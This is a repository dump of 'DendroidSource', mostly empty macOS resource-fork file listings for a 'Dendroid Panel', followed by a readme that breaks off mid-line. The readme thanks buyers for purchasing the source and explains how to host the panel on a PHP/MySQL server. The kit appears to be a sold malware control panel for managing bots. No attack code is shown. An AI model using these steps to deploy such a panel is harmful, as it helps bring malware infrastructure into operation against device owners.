https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._fonts
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._img:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._img
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/._js
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap-glyphicons.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap-glyphicons.css
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.css
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.min.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._bootstrap.min.css
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._image-picker.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/css/._image-picker.css
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.eot
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.otf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.otf
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.svg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.svg
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.ttf
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/fonts/._glyphiconshalflings-regular.woff
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._banner.png
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bannerrot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bannerrot.png
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_off.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_off.jpg
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_on.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._bg_on.jpg
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._login_bg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._login_bg.png
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/img/._logo.png
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.js
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.min.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._bootstrap.min.js
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._date.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._date.js
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._image-picker.min.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._image-picker.min.js
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.min.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.min.js
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.widgets.min.js:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/assets/js/._jquery.tablesorter.widgets.min.js
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._createconfig.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._createconfig.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._index.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._laststep.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._laststep.php
--------------------------------------------------------------------------------
/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._step1.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/__MACOSX/Dendroid Panel/Panel/setup/._step1.php
--------------------------------------------------------------------------------
/master/readme.md:
--------------------------------------------------------------------------------
1 | Thank You For Purchasing The Dendroid Source!
2 |
3 | Requirements:
4 | Web server with PHP and MySql
5 | phpmyadmin (Easy DB setup)
6 | OpenJDK JRE x64
7 | Java JDK (If on x64 Windows you need to set the environment variable JAVA_HOME C:\Program Files\Java\JDK***
8 |
9 | Web Panel Setup:
10 | Extract Dendroid Panel
11 | Move all files to your web server or httdocs if following setup video
12 | Set correct permissions (Linux)
13 | Change URL to your web server in reg.php
14 |
15 | Change URL to your web server in Following Files, E.G http://127.0.0.1/:
16 | applysettings.php
17 | blockbot.php
18 | clearawaiting.php (Also add